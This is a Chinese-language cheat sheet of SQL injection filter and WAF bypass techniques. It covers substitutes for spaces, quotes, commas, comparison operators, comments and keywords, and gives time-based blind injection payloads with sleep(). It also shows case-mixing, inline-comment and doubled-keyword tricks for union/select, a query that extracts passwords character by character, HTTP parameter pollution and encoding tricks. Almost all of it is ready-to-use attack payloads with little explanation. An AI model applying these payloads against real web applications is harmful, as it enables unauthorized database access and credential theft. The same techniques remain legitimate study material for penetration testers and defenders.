绕过空格
两个空格代替一个空格，Tab代替空格，%a0=空格
payload:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/

最基本的绕过方法，用注释替换空格： /* 注释 */

括号绕过空格
mysql语句：select(user())from dual where(1=1)and(2=2)

这种过滤方法常常用于time based盲注,例如：
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

绕过引号
where字句无法使用
用16进制

绕过逗号
在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
使用join：
union select 1,2#
等价于 union select * from (select 1)a join (select 2)b
使用like:
select ascii(mid(user(),1,1))=80 #
等价于 select user() like 'r%'
对于limit可以使用offset来绕过：
select * from news limit 0,1 #
等价于下面这条SQL语句 select * from news limit 1 offset 0

绕过比较符号()
（过滤了<>：sqlmap盲注经常使用<>，使用between的脚本）：

使用greatest()、least（）：（前者返回最大值，后者返回最小值）
同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。 最常见的一个盲注的sql语句：
select * from users where id=1 and ascii(substr(database(),0,1))>64
此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。 那么上面的这条sql语句可以使用greatest变为如下的子句:
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

Between注入
主要用于盲注看页面是否有变化，原理如下，例如username的字符内容是test1，第一个字符是t，a到b搜索不了，页面不正常。 a到t就有了，页面正常
使用between and：
between a and b：
between 1 and 1; 等价于 =1

or and xor not绕过：
and=&& or=|| xor=| not=!

绕过注释符
（#，–(后面跟一个空格））过滤：
id=1' union select 1,2,3||'1
最后的or '1闭合查询语句的最后的单引号，或者：
id=1' union select 1,2,'3

绕过等于号
使用like，regexp,或者使用>,<等

绕过union，select，where等：
(1)使用注释符绕过：
常用注释符：//，-- , /**/, #, --+, -- -, ;,%00,--a
用法：U// NION // SE// LECT //user，pwd from user

(2)使用大小写绕过：
id=-1'UnIoN/**/SeLeCT

(3)内联注释绕过：
id=-1'/!UnIoN/ SeLeCT 1,2,concat(/!table_name/) FrOM /information_schema/.tables /!WHERE //!TaBlE_ScHeMa/ like database()#

(4)双关键字绕过（若删除掉第一个匹配的union就能绕过）：
id=-1'UNIunionONSeLselectECT1,2,3–-


等价替换
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　
或者：
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

参数污染
?id=1&id=2&id=3

编码解码及加密解密
s->%73->%25%37%33

hex,unlcode,base64等

更改请求提交方式
尝试更改Get请求为Post请求

GET POST COOKIE等

POST->multipart/form-data

中间件HPP(HTTP参数污染)

http://www.test.com/index.asp?page=select 1,2,3 from table where id=1
http://www.test.com/index.asp?page=select 1&page=2,3 from table where id=1

HTTP参数污染是指当同一参数出现多次，不同的中间件会解析为不同的结果,以参数color=red&color=blue为例

